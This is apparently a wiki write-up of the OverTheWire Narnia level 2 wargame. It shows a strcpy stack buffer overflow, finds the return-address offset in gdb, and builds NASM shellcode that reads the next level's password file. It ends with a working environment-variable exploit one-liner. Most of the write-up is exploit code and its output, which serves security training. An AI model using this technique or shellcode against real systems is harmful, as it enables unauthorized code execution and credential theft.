Narnia2 - narnia3

From JaxHax
Jump to navigation Jump to search

Code

//narnia2@melinda:/narnia$ cat narnia2.c 
/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char * argv[]){
	char buf[128];

	if(argc == 1){
		printf("Usage: %s argument\n", argv[0]);
		exit(1);
	}
	strcpy(buf,argv[1]);
	printf("%s", buf);

	return 0;
}


Solution

Another BoF... First we need to determine how many bytes are needed to overflow the EIP. I will use gdb, pattern_create, and pattern_offset.

$ pattern_create 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9

narnia2@melinda:/narnia$ gdb -q ./narnia2
Reading symbols from ./narnia2...(no debugging symbols found)...done.
(gdb) r "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"
Starting program: /games/narnia/narnia2 "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"

Program received signal SIGSEGV, Segmentation fault.
0x37654136 in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 32564] will be killed.

Quit anyway? (y or n) y
narnia2@melinda:/narnia$

$ pattern_offset 0x37654136 150
[*] Exact match at offset 140


This means give it 140 bytes of trash and the next 4 bytes over it will overflow the EIP. So for our jump address we will point to the shell variable EGG. First let's set it with our payload.

;$ cat narina2.asm 
global _start

_start:
	jmp _there
_here:

	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; open(ptrToString, Readonly)
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	xor eax, eax
	mov al, 5
	pop ebx
	xor ecx,ecx
	int 0x80

	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; Read(fd, buffer, buffersize)
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	mov ebx, eax  ; Move the file descriptor to ebx
;	sub esp, 50   ; Give some space on the stack
	xor eax, eax
	mov al, 3
	mov ecx, esp
	xor edx, edx
	mov dl, 50
	int 0x80

	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; Write()
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	mov al, 4
	xor ebx, ebx
	inc ebx
	int 0x80

	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; exit
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	xor eax, eax
	mov al, 1
	xor ebx, ebx
	int 0x80

_there:
	call _here
	db '/etc/narnia_pass/narnia3'


Then build and extract the shellcode using my scripts.

$ ./buildnasm.sh narina2.asm 

 [*] Compiling narina2.asm with NASM...Done!
 [*] Linking the object file with ld...Done!
 [*] Removing Object file narina2.o...Done!
 [*] Done Son!


$ ./extract_shellcode.sh narina2

..::[ NASM Shellcode Extractor ]::..

-=[ Object Dump ]=-

Disassembly of section .text:
08048060 <_start>:
 8048060:	eb 26                	jmp    8048088 <_there>
08048062 <_here>:
 8048062:	31 c0                	xor    %eax,%eax
 8048064:	b0 05                	mov    $0x5,%al
 8048066:	5b                   	pop    %ebx
 8048067:	31 c9                	xor    %ecx,%ecx
 8048069:	cd 80                	int    $0x80
 804806b:	89 c3                	mov    %eax,%ebx
 804806d:	31 c0                	xor    %eax,%eax
 804806f:	b0 03                	mov    $0x3,%al
 8048071:	89 e1                	mov    %esp,%ecx
 8048073:	31 d2                	xor    %edx,%edx
 8048075:	b2 32                	mov    $0x32,%dl
 8048077:	cd 80                	int    $0x80
 8048079:	b0 04                	mov    $0x4,%al
 804807b:	31 db                	xor    %ebx,%ebx
 804807d:	43                   	inc    %ebx
 804807e:	cd 80                	int    $0x80
 8048080:	31 c0                	xor    %eax,%eax
 8048082:	b0 01                	mov    $0x1,%al
 8048084:	31 db                	xor    %ebx,%ebx
 8048086:	cd 80                	int    $0x80
08048088 <_there>:
 8048088:	e8 d5 ff ff ff       	call   8048062 <_here>
 804808d:	2f                   	das    
 804808e:	65 74 63             	gs je  80480f4 <_there+0x6c>
 8048091:	2f                   	das    
 8048092:	6e                   	outsb  %ds:(%esi),(%dx)
 8048093:	61                   	popa   
 8048094:	72 6e                	jb     8048104 <_there+0x7c>
 8048096:	69 61 5f 70 61 73 73 	imul   $0x73736170,0x5f(%ecx),%esp
 804809d:	2f                   	das    
 804809e:	6e                   	outsb  %ds:(%esi),(%dx)
 804809f:	61                   	popa   
 80480a0:	72 6e                	jb     8048110 <_there+0x88>
 80480a2:	69                   	.byte 0x69
 80480a3:	61                   	popa   
 80480a4:	33                   	.byte 0x33

-=[ Extracted Shellcode (Length: 69) ]=-

\xeb\x26\x31\xc0\xb0\x05\x5b\x31\xc9\xcd\x80\x89\xc3\x31\xc0\xb0\x03\x89\xe1\x31\xd2\xb2\x32\xcd\x80\xb0\x04\x31\xdb\x43\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd5\xff\xff\xff\x2f\x65\x74\x63\x2f\x6e\x61\x72\x6e\x69\x61\x5f\x70\x61\x73\x73\x2f\x6e\x61\x72\x6e\x69\x61\x33

narnia2@melinda:/narnia$ export EGG=$(echo -ne "\xeb\x26\x31\xc0\xb0\x05\x5b\x31\xc9\xcd\x80\x89\xc3\x31\xc0\xb0\x03\x89\xe1\x31\xd2\xb2\x32\xcd\x80\xb0\x04\x31\xdb\x43\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd5\xff\xff\xff\x2f\x65\x74\x63\x2f\x6e\x61\x72\x6e\x69\x61\x5f\x70\x61\x73\x73\x2f\x6e\x61\x72\x6e\x69\x61\x33")


Now with that set we will create the getenvaddr.c program in tmp and compile it.

narnia2@melinda:/narnia$ nano /tmp/whatwhat.c

narnia2@melinda:/narnia$ cat /tmp/whatwhat.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char *argv[]){
        char *ptr;
        ptr=getenv(argv[1]);
        ptr+=(strlen(argv[0])-strlen(argv[2]))*2;
        printf("%s will be at %p\n",argv[1],ptr);
        return 0;
}

narnia2@melinda:/narnia$ gcc -m32 /tmp/whatwhat.c -o /tmp/whatwhat
Cannot create temporary file in ./: Permission denied
Aborted

narnia2@melinda:/narnia$ cd /tmp

narnia2@melinda:/tmp$ gcc -m32 /tmp/whatwhat.c -o /tmp/whatwhat


Now using this tool we can determine what the offset of our EGG will be in this program

narnia2@melinda:/tmp$ ./whatwhat EGG /narnia/narnia2
EGG will be at 0xffffd8ea


And time to craft our sploit ;-)

narnia2@melinda:/tmp$ /narnia/narnia2 $(perl -e 'print "A"x140; print "\xea\xd8\xff\xff"')
vaequeezee